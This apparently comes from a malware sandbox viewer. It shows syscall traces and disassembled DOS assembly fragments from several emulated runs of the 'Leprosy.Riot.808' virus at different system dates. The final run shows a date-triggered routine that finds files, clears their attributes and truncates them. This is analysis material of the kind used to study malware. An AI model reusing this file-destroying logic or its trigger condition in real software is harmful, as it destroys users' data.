Sample viewer

vx.netlux.org/Virus.DOS.Leprosy.Riot.808.c

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-17T23:03:55.612756026Z	48	PC: 12b35 \| Get DOS version
2018-12-17T23:03:55.615258465Z	44	PC: 12b3d \| Get time 0x12b3d: mov byte ptr [0x102], dl 0x12b41: mov dx, 0x145 0x12b44: mov ah, 0x1a 0x12b46: int 0x21 0x12b48: mov ah, 0x19 0x12b4a: int 0x21 0x12b4c: mov dl, al 0x12b4e: inc dl 0x12b50: mov ah, 0x47 0x12b52: mov si, 0x1a4 0x12b55: int 0x21 0x12b57: mov dx, 0x143 0x12b5a: mov ah, 0x3b 0x12b5c: int 0x21 0x12b5e: mov cx, 0x13 0x12b61: mov dx, 0x137 0x12b64: mov ah, 0x4e 0x12b66: int 0x21 0x12b68: cmp ax, 0x12 0x12b6b: jne 0x12b6f
2018-12-17T23:03:55.617844418Z	26	PC: 12b48 \| Set disk transfer address
2018-12-17T23:03:55.61941464Z	25	PC: 12b4c \| Get default drive
2018-12-17T23:03:55.62118759Z	71	PC: 12b57 \| Get current directory
2018-12-17T23:03:55.625128685Z	59	PC: 12b5e \| Change current directory
2018-12-17T23:03:55.629900357Z	78	PC: 12b68 \| Find first file
2018-12-17T23:03:55.635588445Z	87	PC: 12c4a \| Get or set file date and time
2018-12-17T23:03:55.637689065Z	67	PC: 12c56 \| Get or set file attributes
2018-12-17T23:03:55.639412741Z	59	PC: 12c5d \| Change current directory
2018-12-17T23:03:55.643400629Z	59	PC: 12c64 \| Change current directory
2018-12-17T23:03:55.646175621Z	42	PC: 12c68 \| Get date 0x12c68: cmp cx, 0x7c7 0x12c6c: jb 0x12c9e 0x12c6e: cmp dl, 0x19 0x12c71: jb 0x12c9e 0x12c73: cmp al, 5 0x12c75: jne 0x12c9e 0x12c77: mov dx, 0x145 0x12c7a: mov ah, 0x1a 0x12c7c: int 0x21 0x12c7e: mov ah, 0x4e 0x12c80: mov cx, 7 0x12c83: mov dx, 0x13f 0x12c86: int 0x21 0x12c88: jb 0x12c9e 0x12c8a: mov ax, 0x4301 0x12c8d: xor cx, cx 0x12c8f: int 0x21 0x12c91: mov dx, 0x163 0x12c94: mov ah, 0x3c 0x12c96: int 0x21
2018-12-17T23:03:55.648435455Z	76	PC: 12ca3 \| Terminate with return code (Return code = '0')

{"DateBased":true,"Day":26,"Month":1,"Year":1991,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":14705,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:41:24.726252448Z	48	PC: 12b35 \| Get DOS version
2018-12-25T12:41:24.727655427Z	44	PC: 12b3d \| Get time 0x12b3d: mov byte ptr [0x102], dl 0x12b41: mov dx, 0x145 0x12b44: mov ah, 0x1a 0x12b46: int 0x21 0x12b48: mov ah, 0x19 0x12b4a: int 0x21 0x12b4c: mov dl, al 0x12b4e: inc dl 0x12b50: mov ah, 0x47 0x12b52: mov si, 0x1a4 0x12b55: int 0x21 0x12b57: mov dx, 0x143 0x12b5a: mov ah, 0x3b 0x12b5c: int 0x21 0x12b5e: mov cx, 0x13 0x12b61: mov dx, 0x137 0x12b64: mov ah, 0x4e 0x12b66: int 0x21 0x12b68: cmp ax, 0x12 0x12b6b: jne 0x12b6f
2018-12-25T12:41:24.740769102Z	26	PC: 12b48 \| Set disk transfer address
2018-12-25T12:41:24.741892749Z	25	PC: 12b4c \| Get default drive
2018-12-25T12:41:24.742950604Z	71	PC: 12b57 \| Get current directory
2018-12-25T12:41:24.746404363Z	59	PC: 12b5e \| Change current directory
2018-12-25T12:41:24.750838214Z	78	PC: 12b68 \| Find first file
2018-12-25T12:41:24.757329953Z	87	PC: 12c4a \| Get or set file date and time
2018-12-25T12:41:24.760361806Z	67	PC: 12c56 \| Get or set file attributes
2018-12-25T12:41:24.762389287Z	59	PC: 12c5d \| Change current directory
2018-12-25T12:41:24.766692153Z	59	PC: 12c64 \| Change current directory
2018-12-25T12:41:24.769043042Z	42	PC: 12c68 \| Get date 0x12c68: cmp cx, 0x7c7 0x12c6c: jb 0x12c9e 0x12c6e: cmp dl, 0x19 0x12c71: jb 0x12c9e 0x12c73: cmp al, 5 0x12c75: jne 0x12c9e 0x12c77: mov dx, 0x145 0x12c7a: mov ah, 0x1a 0x12c7c: int 0x21 0x12c7e: mov ah, 0x4e 0x12c80: mov cx, 7 0x12c83: mov dx, 0x13f 0x12c86: int 0x21 0x12c88: jb 0x12c9e 0x12c8a: mov ax, 0x4301 0x12c8d: xor cx, cx 0x12c8f: int 0x21 0x12c91: mov dx, 0x163 0x12c94: mov ah, 0x3c 0x12c96: int 0x21
2018-12-25T12:41:24.77147697Z	76	PC: 12ca3 \| Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":14705,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:41:24.897093815Z	48	PC: 12b35 \| Get DOS version
2018-12-25T12:41:24.898616414Z	44	PC: 12b3d \| Get time 0x12b3d: mov byte ptr [0x102], dl 0x12b41: mov dx, 0x145 0x12b44: mov ah, 0x1a 0x12b46: int 0x21 0x12b48: mov ah, 0x19 0x12b4a: int 0x21 0x12b4c: mov dl, al 0x12b4e: inc dl 0x12b50: mov ah, 0x47 0x12b52: mov si, 0x1a4 0x12b55: int 0x21 0x12b57: mov dx, 0x143 0x12b5a: mov ah, 0x3b 0x12b5c: int 0x21 0x12b5e: mov cx, 0x13 0x12b61: mov dx, 0x137 0x12b64: mov ah, 0x4e 0x12b66: int 0x21 0x12b68: cmp ax, 0x12 0x12b6b: jne 0x12b6f
2018-12-25T12:41:24.901265343Z	26	PC: 12b48 \| Set disk transfer address
2018-12-25T12:41:24.902529465Z	25	PC: 12b4c \| Get default drive
2018-12-25T12:41:24.903797936Z	71	PC: 12b57 \| Get current directory
2018-12-25T12:41:24.907636448Z	59	PC: 12b5e \| Change current directory
2018-12-25T12:41:24.912034755Z	78	PC: 12b68 \| Find first file
2018-12-25T12:41:24.91628923Z	87	PC: 12c4a \| Get or set file date and time
2018-12-25T12:41:24.919368858Z	67	PC: 12c56 \| Get or set file attributes
2018-12-25T12:41:24.92142358Z	59	PC: 12c5d \| Change current directory
2018-12-25T12:41:24.926185216Z	59	PC: 12c64 \| Change current directory
2018-12-25T12:41:24.929504523Z	42	PC: 12c68 \| Get date 0x12c68: cmp cx, 0x7c7 0x12c6c: jb 0x12c9e 0x12c6e: cmp dl, 0x19 0x12c71: jb 0x12c9e 0x12c73: cmp al, 5 0x12c75: jne 0x12c9e 0x12c77: mov dx, 0x145 0x12c7a: mov ah, 0x1a 0x12c7c: int 0x21 0x12c7e: mov ah, 0x4e 0x12c80: mov cx, 7 0x12c83: mov dx, 0x13f 0x12c86: int 0x21 0x12c88: jb 0x12c9e 0x12c8a: mov ax, 0x4301 0x12c8d: xor cx, cx 0x12c8f: int 0x21 0x12c91: mov dx, 0x163 0x12c94: mov ah, 0x3c 0x12c96: int 0x21
2018-12-25T12:41:24.932963913Z	76	PC: 12ca3 \| Terminate with return code (Return code = '0')

{"DateBased":true,"Day":1,"Month":1,"Year":1991,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":14705,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:41:24.956725403Z	48	PC: 12b35 \| Get DOS version
2018-12-25T12:41:24.958577115Z	44	PC: 12b3d \| Get time 0x12b3d: mov byte ptr [0x102], dl 0x12b41: mov dx, 0x145 0x12b44: mov ah, 0x1a 0x12b46: int 0x21 0x12b48: mov ah, 0x19 0x12b4a: int 0x21 0x12b4c: mov dl, al 0x12b4e: inc dl 0x12b50: mov ah, 0x47 0x12b52: mov si, 0x1a4 0x12b55: int 0x21 0x12b57: mov dx, 0x143 0x12b5a: mov ah, 0x3b 0x12b5c: int 0x21 0x12b5e: mov cx, 0x13 0x12b61: mov dx, 0x137 0x12b64: mov ah, 0x4e 0x12b66: int 0x21 0x12b68: cmp ax, 0x12 0x12b6b: jne 0x12b6f
2018-12-25T12:41:24.960507524Z	26	PC: 12b48 \| Set disk transfer address
2018-12-25T12:41:24.962701192Z	25	PC: 12b4c \| Get default drive
2018-12-25T12:41:24.9645072Z	71	PC: 12b57 \| Get current directory
2018-12-25T12:41:24.966940744Z	59	PC: 12b5e \| Change current directory
2018-12-25T12:41:24.969788136Z	78	PC: 12b68 \| Find first file
2018-12-25T12:41:24.974280168Z	87	PC: 12c4a \| Get or set file date and time
2018-12-25T12:41:24.976074738Z	67	PC: 12c56 \| Get or set file attributes
2018-12-25T12:41:24.977872081Z	59	PC: 12c5d \| Change current directory
2018-12-25T12:41:24.980544613Z	59	PC: 12c64 \| Change current directory
2018-12-25T12:41:24.98249064Z	42	PC: 12c68 \| Get date 0x12c68: cmp cx, 0x7c7 0x12c6c: jb 0x12c9e 0x12c6e: cmp dl, 0x19 0x12c71: jb 0x12c9e 0x12c73: cmp al, 5 0x12c75: jne 0x12c9e 0x12c77: mov dx, 0x145 0x12c7a: mov ah, 0x1a 0x12c7c: int 0x21 0x12c7e: mov ah, 0x4e 0x12c80: mov cx, 7 0x12c83: mov dx, 0x13f 0x12c86: int 0x21 0x12c88: jb 0x12c9e 0x12c8a: mov ax, 0x4301 0x12c8d: xor cx, cx 0x12c8f: int 0x21 0x12c91: mov dx, 0x163 0x12c94: mov ah, 0x3c 0x12c96: int 0x21
2018-12-25T12:41:24.984561896Z	76	PC: 12ca3 \| Terminate with return code (Return code = '0')

{"DateBased":true,"Day":25,"Month":1,"Year":1991,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":14705,"SideJobID":0}

GIF

Syscalls:

Time	Syscall Op	Syscall Name
2018-12-25T12:41:24.959838117Z	48	PC: 12b35 \| Get DOS version
2018-12-25T12:41:24.961364913Z	44	PC: 12b3d \| Get time 0x12b3d: mov byte ptr [0x102], dl 0x12b41: mov dx, 0x145 0x12b44: mov ah, 0x1a 0x12b46: int 0x21 0x12b48: mov ah, 0x19 0x12b4a: int 0x21 0x12b4c: mov dl, al 0x12b4e: inc dl 0x12b50: mov ah, 0x47 0x12b52: mov si, 0x1a4 0x12b55: int 0x21 0x12b57: mov dx, 0x143 0x12b5a: mov ah, 0x3b 0x12b5c: int 0x21 0x12b5e: mov cx, 0x13 0x12b61: mov dx, 0x137 0x12b64: mov ah, 0x4e 0x12b66: int 0x21 0x12b68: cmp ax, 0x12 0x12b6b: jne 0x12b6f
2018-12-25T12:41:24.96283869Z	26	PC: 12b48 \| Set disk transfer address
2018-12-25T12:41:24.963982901Z	25	PC: 12b4c \| Get default drive
2018-12-25T12:41:24.965285256Z	71	PC: 12b57 \| Get current directory
2018-12-25T12:41:24.968071887Z	59	PC: 12b5e \| Change current directory
2018-12-25T12:41:24.972726347Z	78	PC: 12b68 \| Find first file
2018-12-25T12:41:24.984219631Z	87	PC: 12c4a \| Get or set file date and time
2018-12-25T12:41:24.98556038Z	67	PC: 12c56 \| Get or set file attributes
2018-12-25T12:41:24.987136755Z	59	PC: 12c5d \| Change current directory
2018-12-25T12:41:24.996705879Z	59	PC: 12c64 \| Change current directory
2018-12-25T12:41:24.998724154Z	42	PC: 12c68 \| Get date 0x12c68: cmp cx, 0x7c7 0x12c6c: jb 0x12c9e 0x12c6e: cmp dl, 0x19 0x12c71: jb 0x12c9e 0x12c73: cmp al, 5 0x12c75: jne 0x12c9e 0x12c77: mov dx, 0x145 0x12c7a: mov ah, 0x1a 0x12c7c: int 0x21 0x12c7e: mov ah, 0x4e 0x12c80: mov cx, 7 0x12c83: mov dx, 0x13f 0x12c86: int 0x21 0x12c88: jb 0x12c9e 0x12c8a: mov ax, 0x4301 0x12c8d: xor cx, cx 0x12c8f: int 0x21 0x12c91: mov dx, 0x163 0x12c94: mov ah, 0x3c 0x12c96: int 0x21
2018-12-25T12:41:25.000233097Z	26	PC: 12c7e \| Set disk transfer address
2018-12-25T12:41:25.00135992Z	78	PC: 12c88 \| Find first file
2018-12-25T12:41:25.007831746Z	67	PC: 12c91 \| Get or set file attributes
2018-12-25T12:41:25.011234637Z	60	PC: 12c98 \| Create or truncate file
2018-12-25T12:41:25.025470779Z	79	PC: 12c88 \| Find next file (See above)
2018-12-25T12:41:25.028182262Z	67	PC: 12c91 \| Get or set file attributes (See above)
2018-12-25T12:41:25.036545018Z	60	PC: 12c98 \| Create or truncate file (See above)
2018-12-25T12:41:25.048210418Z	79	PC: 12c88 \| Find next file (See above)
2018-12-25T12:41:25.051199299Z	67	PC: 12c91 \| Get or set file attributes (See above)
2018-12-25T12:41:25.0610435Z	60	PC: 12c98 \| Create or truncate file (See above)
2018-12-25T12:41:25.071058668Z	79	PC: 12c88 \| Find next file (See above)
2018-12-25T12:41:25.073565023Z	67	PC: 12c91 \| Get or set file attributes (See above)
2018-12-25T12:41:25.081279892Z	60	PC: 12c98 \| Create or truncate file (See above)
2018-12-25T12:41:25.089432161Z	79	PC: 12c88 \| Find next file (See above)
2018-12-25T12:41:25.093155213Z	67	PC: 12c91 \| Get or set file attributes (See above)
2018-12-25T12:41:25.110258471Z	60	PC: 12c98 \| Create or truncate file (See above)
2018-12-25T12:41:25.125993474Z	79	PC: 12c88 \| Find next file (See above)
2018-12-25T12:41:25.12912248Z	67	PC: 12c91 \| Get or set file attributes (See above)
2018-12-25T12:41:25.140394814Z	60	PC: 12c98 \| Create or truncate file (See above)
2018-12-25T12:41:25.148304748Z	79	PC: 12c88 \| Find next file (See above)
2018-12-25T12:41:25.150807852Z	67	PC: 12c91 \| Get or set file attributes (See above)
2018-12-25T12:41:25.156922076Z	60	PC: 12c98 \| Create or truncate file (See above)
2018-12-25T12:41:25.168347253Z	79	PC: 12c88 \| Find next file (See above)
2018-12-25T12:41:25.171771925Z	67	PC: 12c91 \| Get or set file attributes (See above)
2018-12-25T12:41:25.181101084Z	60	PC: 12c98 \| Create or truncate file (See above)
2018-12-25T12:41:25.191736703Z	79	PC: 12c88 \| Find next file (See above)
2018-12-25T12:41:25.194057058Z	67	PC: 12c91 \| Get or set file attributes (See above)
2018-12-25T12:41:25.203290426Z	60	PC: 12c98 \| Create or truncate file (See above)
2018-12-25T12:41:25.213682197Z	79	PC: 12c88 \| Find next file (See above)
2018-12-25T12:41:25.216323335Z	76	PC: 12ca3 \| Terminate with return code (Return code = '0')